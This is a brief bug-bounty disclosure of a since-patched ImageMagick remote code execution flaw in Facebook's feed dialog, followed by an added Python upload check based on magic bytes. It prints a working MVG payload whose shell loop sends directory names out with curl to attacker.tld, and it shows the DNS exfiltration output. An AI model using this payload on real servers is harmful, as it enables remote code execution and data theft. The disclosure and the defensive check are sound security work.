Facebook Remote Code Execution Vulnerability...
By Micky Verma
Exploit URL:
https://www.facebook.com/dialog/feed?app_id=APP_ID&link=link.example.tld&picture=http%3A%2F%2Fattacker.tld%2Fexploit.png&name=news_name&caption=news_caption&description=news_descriotion&redirect_uri=http%3A%2F%2Fwww.facebook.com&ext=1476569763&hash=Aebid3vZFdh4UF1H
Payload:
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://127.0.0.1/x.php?x=%60for i in $(ls /) ; do curl "http://$i.attacker.tld/" -d @- > /dev/null; done`'
pop graphic-context
And the result was:
NAME: home.attacker.tld, Type: A
NAME: boot.attacker.tld, Type: 28
NAME: dev.attacker.tld, Type: 28
NAME: bin.attacker.tld, Type: A
…
and so on...
The `id` shell command returned:
NAME: uid=99(nobody).attacker.tld., Type: 28
NAME: groups=99(nobody).attacker.tld., Type: A
NAME: gid=99(nobody).attacker.tld., Type: A
As full proof that the exploit works, he provided the Facebook security team with the output of `cat /proc/version`, which he is not going to publish on his blog.
The vulnerability was patched by the Facebook team, and it is secure for now.
The HOC team congratulates Andrey Leonov on the bounty award; keep bug hunting the same way in future.
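The payload above is an ImageMagick MVG vector script delivered under a `.png` name, so one defensive layer is to check an upload's leading bytes before any converter sees it. The following is an added example, not code from the original post or from Facebook; the accepted formats, function names and sample files are assumptions made for illustration.

```python
# Added example: content pre-check for uploads before any image conversion.
# Accepted formats and file names are assumptions made for this illustration.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Directives of ImageMagick's MVG vector script format, as seen in the payload.
MVG_MARKERS = (b"push graphic-context", b"pop graphic-context", b"viewbox ")


def sniff_format(data: bytes):
    """Return the raster format whose magic bytes open the file, else None."""
    for fmt, magic in MAGIC.items():
        if data.startswith(magic):
            return fmt
    return None


def check_upload(filename: str, data: bytes):
    """Return (accepted, reason); only the first 4 KiB is scanned for MVG."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    ext = "jpg" if ext == "jpeg" else ext
    fmt = sniff_format(data)
    if fmt is None:
        if any(m in data[:4096].lower() for m in MVG_MARKERS):
            return False, "MVG script, not a raster image"
        return False, "unrecognized content"
    if fmt != ext:
        return False, f"extension {ext or '(none)'} does not match content {fmt}"
    return True, fmt


# Constructed samples: a minimal PNG header and an MVG script with a placeholder URL.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
MVG_SAMPLE = (
    b"push graphic-context\n"
    b"viewbox 0 0 640 480\n"
    b"image over 0,0 0,0 'https://example.invalid/placeholder'\n"
    b"pop graphic-context\n"
)

if __name__ == "__main__":
    for name, blob in [("photo.png", PNG_SAMPLE), ("exploit.png", MVG_SAMPLE),
                       ("photo.jpg", PNG_SAMPLE)]:
        print(name, check_upload(name, blob))
```

A magic-byte check is one layer only; it belongs alongside the converter's own restrictions on script and URL coders.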